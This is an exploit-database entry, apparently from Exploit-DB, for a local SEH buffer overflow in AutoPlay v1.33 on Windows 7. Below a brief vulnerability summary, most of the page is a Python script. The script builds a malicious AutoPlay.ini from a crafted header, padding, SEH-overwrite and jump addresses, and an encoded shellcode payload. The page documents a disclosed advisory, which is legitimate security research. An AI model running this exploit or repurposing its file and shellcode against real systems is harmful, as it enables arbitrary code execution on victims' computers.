header-logo
Suggest Exploit
vendor:
AutoPlay
by:
badc0re (Dame Jovanoski)
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: AutoPlay
Affected Version From: 1.33
Affected Version To: 1.33
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows 7 Ultimate
2011

AutoPlay v1.33 (autoplay.ini) Local Buffer Overflow Exploit (SEH)

The program suffers from a buffer overflow vulnerability when opening autorun file (.ini), as a result of adding extra bytes to parts of the edited file, giving the attackers the possibility for arbitrary code execution on the affected system. Also, the buffer overflow vulnerability allows the attacker to bypass Structured Exception Handling (SEH) protection mechanism.

Mitigation:

Update to a patched version of the software.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
#
# AutoPlay v1.33 (autoplay.ini) Local Buffer Overflow Exploit (SEH)
#
#
# Vendor: Naugher Software
# Product web page: http://www.naughter.com
# Affected version: 1.33
#
# Summary: AutoPlay is a shareware application used for making
# autorun.ini files that can be edited and stored to compact disks.
#
# Desc: The program suffers from a buffer overflow vulnerability
# when openinng autorun file (.ini), as a result of adding extra
# bytes to parts of the edited file, giving the atackers the
# possibility for an arbitrary code execution on the affected
# system. Also the buffer overflow vulnerability allows the
# atacker to bypass Structured Exception Handling (SEH)
# protection mechanism.
#
# Tested on: Microsoft Windows 7 Ultimate
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4994
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4994.php
#
#
# 13.02.2011
#


from struct import *
import time
f=open('AutoPlay.ini','w')

shell=('\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61'
'\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13'
'\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f'
'\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b'
'\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30'
'\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72'
'\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd'
'\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e'
'\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52'
'\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56'); 

head=('\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65'
'\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61'
'\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64'
'\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70'
'\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70'
'\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c'
'\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d'
'\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e'
'\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37'
'\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d'
'\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d'
'\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d'
'\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a'
'\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43'
'\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e'
'\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d'
'\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a'
'\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d'
'\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30'
'\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c'
'\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61'
'\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77'
'\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74'
'\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d'
'\x65\x3d')

junk='\x41'*32
junk1='\x41'*92
nseh='\xeb\x06\x90\x90'
seh='\x62\xce\x86\x7c' # pop pop ret
esp='\x7b\x46\x86\x7c' # jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print('File created')
except:
print('File cannot be created')
cqrsecured